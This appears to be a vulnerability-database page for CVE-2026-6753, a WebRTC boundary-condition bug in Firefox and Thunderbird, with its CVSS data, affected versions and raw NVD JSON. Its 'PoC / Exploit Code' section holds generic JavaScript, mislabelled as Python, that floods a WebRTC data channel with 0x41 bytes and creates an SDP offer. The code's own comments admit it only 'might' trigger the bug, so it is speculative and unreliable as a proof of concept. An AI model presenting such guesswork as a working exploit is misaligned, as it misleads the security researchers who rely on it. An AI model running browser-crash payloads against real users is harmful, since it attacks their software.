Security Vulnerability Report
中文
CVE-2026-6753 CVSS 7.3 HIGH

CVE-2026-6753

Published: 2026-04-21 13:16:21
Last Modified: 2026-04-22 17:40:28

Description

Incorrect boundary conditions in the WebRTC component. This vulnerability was fixed in Firefox 150, Firefox ESR 140.10, Thunderbird 150, and Thunderbird 140.10.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:* - VULNERABLE
Mozilla Firefox < 150
Mozilla Firefox ESR < 140.10
Mozilla Thunderbird < 150
Mozilla Thunderbird < 140.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-6753: WebRTC Boundary Condition --> <html> <head> <title>CVE-2026-6753 PoC</title> </head> <body> <script> // Create a PeerConnection to trigger WebRTC handling const pc = new RTCPeerConnection({ iceServers: [] }); // Create a data channel often used in exploitation const dc = pc.createDataChannel("exploit"); // Attempt to send data that might trigger the boundary condition // Specific payload size or structure may be needed based on the bug details try { // Sending a large buffer or specific malformed pattern const buffer = new ArrayBuffer(0x100000); const view = new Uint8Array(buffer); // Fill with pattern to potentially confuse boundary checks for(let i=0; i<view.length; i++) { view[i] = 0x41; } dc.send(buffer); console.log("Payload sent via WebRTC DataChannel"); } catch (e) { console.log("Exception caught: " + e); } // Alternatively, manipulate SDP offer/answer pc.createOffer().then(offer => { // Modify SDP to include malformed parameters if needed pc.setLocalDescription(offer); }); console.log("Check if browser crashes or behaves unexpectedly."); </script> <p>CVE-2026-6753 Proof of Concept. Inspect console.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6753", "sourceIdentifier": "[email protected]", "published": "2026-04-21T13:16:21.340", "lastModified": "2026-04-22T17:40:28.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect boundary conditions in the WebRTC component. This vulnerability was fixed in Firefox 150, Firefox ESR 140.10, Thunderbird 150, and Thunderbird 140.10."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "140.10.0", "matchCriteriaId": "15AF037C-5C86-48EB-B1DE-3AC100A34596"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "150.0", "matchCriteriaId": "67B01D49-66FA-4C76-9EB4-2B8CD61FBEB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:thunderbird:*:*:*:*:esr:*:*:*", "versionStartIncluding": "140.0", "versionEndExcluding": "140.10.0", "matchCriteriaId": "6A8A3284-C06C-4591-9548-5324BD91C4FC"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2027501", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-30/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-32/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-33/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-34/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}